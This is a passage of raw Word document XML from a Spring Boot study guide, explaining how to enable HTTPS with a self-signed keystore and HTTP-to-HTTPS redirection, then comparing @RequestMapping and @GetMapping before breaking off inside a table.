          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot integrates seamlessly with other Spring projects like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for microservices development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8779E"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Rapid Development</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With Spring Boot, developers can quickly create production-grade applications without dealing with much configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1BF04"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summary, Spring Boot can be used for a wide variety of applications, from small command-line utilities to large-scale enterprise applications. Its simplicity, scalability, and integration with other Spring projects make it one of the most popular frameworks for modern Java development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D2111C" w14:textId="605D22DE"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86546E1">
          <v:rect id="_x0000_i2597" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A20BC7B" w14:textId="230ABC31" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="000C0733">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="608" w:name="_Toc196308088"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is https used in SpringBoot applications</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="608"/>
    </w:p>
    <w:p w14:paraId="5FCC6419" w14:textId="6C0BC267" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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 Spring Boot applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HyperText Transfer Protocol Secure) is used to encrypt the communication between the client (browser) and the server. This ensures that data exchanged between them is secure and cannot be intercepted or altered by unauthorized parties. To enable HTTPS in a Spring Boot application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F290CD7" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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teps to Enable HTTPS in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE7451"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Generate a Self-Signed SSL Certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05210399" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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For testing purposes, you can generate a self-signed SSL certificate using the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Keytool</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93B296"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 command to generate a keystore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337128F"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keytool -genkeypair -alias selfsigned -keyalg RSA -keysize 2048 -storetype PKCS12 -keystore keystore.p12 -validity 3650</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CFF1A2"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command will create a keystore.p12 file, which will contain your SSL certificate and private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75AD18"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onfigure application.properties or application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After generating the keystore, you need to configure Spring Boot to use it for HTTPS connections. You can do this by adding the following configuration in the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E3202"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B514AB9"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port=8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AC666F"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ssl.key-store-type=PKCS12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E29840"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ssl.key-store=classpath:keystore.p12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7A69D"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ssl.key-store-password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFCD4C"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server.ssl.key-alias=selfsigned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333A48B"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3C2A5B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231D84D"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ort: 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43C362"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sl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB7665"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key-store: classpath:keystore.p12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9DAD4"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key-store-password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357CE490"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key-store-type: PKCS12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13593139"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key-alias: selfsigned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC20111"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Here’s the explanation of the properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFCD35" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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port=8443: Specifies the port to run the HTTPS server (default for HTTPS is 443, but 8443 is commonly used in development).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63603089" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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ssl.key-store: Path to the keystore file (either a file path or classpath resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32E024" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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ssl.key-store-password: Password for the keystore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CDC641" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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ssl.key-alias: Alias of the key in the keystore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B8B25"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Redirect HTTP to HTTPS (Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure that HTTP traffic is automatically redirected to HTTPS, you can configure Spring Boot to listen on HTTP (port 8080) and redirect to HTTPS (port 8443). To do this, you can create a WebSecurityConfigurerAdapter to redirect requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55FAFD"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 of configuring the redirection in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A68A5"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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD4647"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDDE73"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security.config.annotation.web.builders.HttpSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB8E48"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security.config.annotation.web.configuration.EnableWebSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E5C50"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security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA84214" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FBCB03"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A81272"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D88FE2"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A149D3B" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E0A8E3"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBBFF1A"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03368534"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0E000"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httpBasic()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE3E1C"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061AE69"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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6CBDE5"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tMatchers("/**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBDEC89"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D27FE71"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quiresChannel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258F124"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yRequest().requiresSecure();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927E5D8"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4AA95B4C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E20458E"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1719355A"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TomcatEmbeddedServletContainerFactory tomcatEmbeddedServletContainerFactory() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D206C3A"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omcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4BF32"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factory.addConnectorCustomizers((connector) -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258797A4"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connector.setPort(8080); // Default HTTP port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD12413"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connector.setRedirectPort(8443); // Redirect to HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61E144"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50BCAEA"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factory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20744B5A"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287B7518"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2347D271"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Testing HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560FFC9" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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tart your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541877A" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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ccess your application via https://localhost:8443 (or the port you configured).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF73BC4" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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will likely get a warning in the browser if you are using a self-signed certificate. You can bypass this warning for testing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCD65A" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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lastRenderedPageBreak/>
        <w:t>Using Valid SSL Certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777EFD2"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For production environments, you should use a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>valid SSL certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> issued by a trusted Certificate Authority (CA) like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Let's Encrypt</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DigiCert</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GlobalSign</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or others. Instead of using a self-signed certificate, you'll need to replace the keystore.p12 file with the one containing the public and private key from the trusted certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F381CD0" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B62303"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SL (Secure Socket Layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that data is encrypted, making communication between client and server secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A26EC"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 Boot provides simple configuration options for enabling HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763F6E3"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e self-signed certificates for development and testing, but always use a valid certificate for production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103436D"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ing HTTP to HTTPS redirection ensures better security by forcing the usage of HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E61B9"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This is how you can enable and configure </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your Spring Boot application for secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14EE78" w14:textId="499EBAF2"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D1C16AD">
          <v:rect id="_x0000_i2598" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB3DE9" w14:textId="277BB1D4" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF10A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="609" w:name="_Toc196308089"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between RequestMapping and GetMapping</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="609"/>
    </w:p>
    <w:p w14:paraId="195C4FBA" w14:textId="703008A7" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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primary difference between @RequestMapping and @GetMapping in Spring is in their usage and the level of specificity they provide when handling HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B60B9" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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RequestMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A5DFF"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General-purpose annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is a more general-purpose annotation used to map HTTP requests to handler methods of MVC controllers in Spring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4A960"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upports all HTTP methods</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By default, @RequestMapping can be used for any HTTP method (GET, POST, PUT, DELETE, etc.). You can specify the HTTP method type by using the method attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22028206"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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is flexible and can handle multiple types of HTTP requests by specifying the method attribute. For example, it can handle GET, POST, PUT, DELETE, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542D1DB"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7F79A8CE"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questMapping(value = "/hello", method = RequestMethod.GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DD667"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String getHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A271917"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA61F3"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088C4B8C" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093AEA0B"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questMapping(value = "/hello", method = RequestMethod.POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431539B"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String postHello(@RequestBody String input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63613035"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Received: " + input;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283455C"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2108A7AD" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641555BD"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ecialized for HTTP GET requests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: @GetMapping is a shorthand version of @RequestMapping for handling HTTP GET requests. It was introduced in Spring 4.3 as part of a set of more specific annotations for each HTTP method (like @PostMapping, @PutMapping, @DeleteMapping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21870EDA"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No need to specify the HTTP method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since @GetMapping is specifically designed for GET requests, you don't need to explicitly define the HTTP method. It is assumed to be a GET request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555176D8"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31491868"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tMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A22C0"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String getHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53F8D7"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E28D2"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7F0DC86" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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9"/>
        <w:gridCol w:w="5084"/>
        <w:gridCol w:w="3871"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="14749673" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E48F185" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F666A49" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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RequestMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77084CBB" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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GetMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="57F1D4FC" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57BC7EA3"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HTTP Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
